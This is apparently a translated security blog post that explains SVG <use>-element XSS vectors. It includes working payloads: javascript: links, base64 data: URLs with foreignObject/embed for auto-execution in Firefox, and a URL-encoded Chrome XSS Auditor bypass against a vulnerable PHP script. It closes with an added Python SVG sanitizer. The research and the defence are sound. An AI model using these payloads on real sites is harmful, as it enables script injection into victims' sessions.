Attackers can use SVG to bypass browser XSS auditing.


[Translated From]: http://insert-script.blogspot.com/2014/02/svg-fun-time-firefox-svg-vector.html

================================== SVG <use> element ==================================

The <use> element in SVG is used to reuse other elements. It is normally used together with <defs> and the like, but it can also reference an element in an external SVG file by its id. Normally the value of the xlink:href attribute of <use> starts with the '#' character; the basic structure for referencing an external element looks like this.

test.html:


<svg><use xlink:href='external.svg#rectangle' /></svg>

external.svg:

<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
<a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a>
</svg>


The external.svg file starts with an <svg> tag whose id is set to rectangle and uses a <rect> tag to draw a rectangle. The <rect> is wrapped in an <a> tag to create a hyperlink. With the javascript: URL protocol, clicking the hyperlink executes JavaScript. Even though the SVG is loaded through the <use> tag, the JavaScript is executed.

Note that <use> can only load SVG files, and they must satisfy the same-origin policy.

================================== FIREFOX ==================================

Because the external SVG file to be loaded must be same-origin, this feature does not look like a useful XSS vector at first. But Firefox helps us out: it accepts the data: URL protocol here, which lets us create the "external" file on the fly. It requires the correct MIME type, which is image/svg+xml, followed either by our payload or by the keyword base64 and the base64-encoded payload.

In particular, base64 encoding the payload avoids problems with breaking the HTML structure. Now we no longer have to rely on another file on the server.

test.html:
<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg>


Base64 payload after decoding:

<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
The browser displays a black rectangle and pops up the location when it is clicked. But why bother the victim with clicking? They never do what they should do :) The <script> tag in external.svg is not parsed, but SVG supports the <foreignObject> element, which includes content from another namespace when the required extension is specified. This makes it possible to load non-SVG elements, which means <iframe>, <embed> and all other supported HTML elements are available, and we can pick one of them to execute JavaScript. Here we use <embed> together with the javascript: URL protocol. Look at the following SVG:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">
<script>alert(1)</script>
<foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml">
<embed xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(location)" />
</foreignObject>
</svg>
It loads an <embed> tag through <foreignObject> and uses the javascript: URL protocol to execute JavaScript. We encode the payload with base64 and use the data: protocol again.

test.html:


<svg><use xlink:href="data:image/svg+xml;base64,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#rectangle" /></svg>

When test.html is opened in Firefox 27, the location pops up. So we have another vector in SVG that executes JavaScript. In addition, the payload contains <script>alert(1)</script>, which proves that the <script> tag is not parsed.

================================== Chrome XSS Auditor bypass ==================================

Now let's use this feature against Chrome. Chrome does not support the data: URL protocol in the xlink:href attribute of <use>. Also, I found no way to execute JavaScript without user interaction, but at least with the right user interaction it can be used to bypass the Blink/WebKit XSS Auditor. Parameter pollution is not needed here; one parameter is enough. The Blink/WebKit XSS Auditor cannot catch an attack that is split into two or more XSS attacks. Consider this PHP script (xss.php):

<?php
echo "<body>";
echo $_GET['x'];
echo "</body>";
?>

This script has an XSS vulnerability, but the following payload triggers the XSS Auditor:

http://site.com/xss.php?x=<svg><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>

So let's use the <use> element.

================================== Creating the SVG on the fly ==================================

We want to load another SVG file, so we start with <svg><use xlink:href=, but wait: it must be same-origin. We cannot use the data: pseudo-protocol. How do we get a file onto the server? Easy: we use the XSS vulnerability twice in a row! First we construct a URL that creates an SVG containing a javascript: URL as a pseudo-protocol:
http://site.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>

 

If you paste the whole URL into a browser without an XSS filter, a black rectangle appears immediately. But as mentioned above, Chrome's XSS Auditor catches this attack. Let's continue: now we use the SVG file we just created in the <use> element and build a URL like this:
http://site.com/xss.php?x=<svg><use height=200 width=200 xlink:href='http://vulnerabledomain.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100"/></a></svg>#rectangle'/></svg>

 

Do not forget to URL-encode it:
http://site.com/xss.php?x=%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://site.com/xss.php?x=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E

 

This displays the rectangle, and clicking it executes the alert, but this time the XSS Auditor is not triggered :)
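A defensive counterpart, added here and not part of the original post: an allow-list sanitizer for user-supplied SVG, written with Python's standard xml.etree, that removes the vectors described above (javascript: hrefs on <a>, <use> references to external files or data: URLs, <script>, and <foreignObject> with its XHTML children). The element allow-list, the fragment-only href rule and the sample payload are my own choices.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialise with a plain default namespace
ET.register_namespace("xlink", XLINK_NS)

# Allow-list of SVG elements. <script>, <foreignObject> and everything outside the
# SVG namespace (the XHTML <embed>/<iframe>) are absent, so they are dropped whole.
ALLOWED_TAGS = {"svg", "g", "defs", "use", "a", "title", "desc", "rect", "circle",
                "ellipse", "line", "polyline", "polygon", "path", "text"}
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}   # SVG 2 href and the xlink:href form
# Only same-document fragments (#id) pass. External files, data: URLs and
# javascript: URLs, i.e. every reference the post's <use>/<a> tricks rely on, fail.
SAFE_URL = re.compile(r"^#[A-Za-z_][\w.:-]*$")

def _split(tag):  # ElementTree's '{namespace}name' -> (namespace, name)
    ns, _, name = tag[1:].partition("}") if tag.startswith("{") else ("", "", tag)
    return ns, name

def _clean(elem):
    """Sanitise elem in place; return False if the element itself must be dropped."""
    ns, name = _split(elem.tag)
    if ns != SVG_NS or name not in ALLOWED_TAGS:
        return False
    for attr, value in list(elem.attrib.items()):
        if _split(attr)[1].lower().startswith("on"):      # onload=, onclick=, ...
            del elem.attrib[attr]
        elif attr in URL_ATTRS and not SAFE_URL.match(value.strip()):
            return False                                  # non-fragment reference
    for child in list(elem):
        if not _clean(child):
            elem.remove(child)
    return True

def sanitize_svg(svg_text):
    """Parse a standalone SVG document and return it with the dangerous parts removed."""
    root = ET.fromstring(svg_text)
    if not _clean(root):
        raise ValueError("root is not an acceptable <svg> element")
    return ET.tostring(root, encoding="unicode")

# Constructed sample: the clickable javascript: rectangle from the post.
PAYLOAD = ('<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" '
           'xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">'
           '<a xlink:href="javascript:alert(location)"><rect width="100" height="100"/></a></svg>')

if __name__ == "__main__":
    print(sanitize_svg(PAYLOAD))   # the <a> wrapper and its <rect> are gone
```

It expects a standalone SVG document with its namespaces declared; inline SVG cut out of an HTML page has to be reparsed in that form first.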
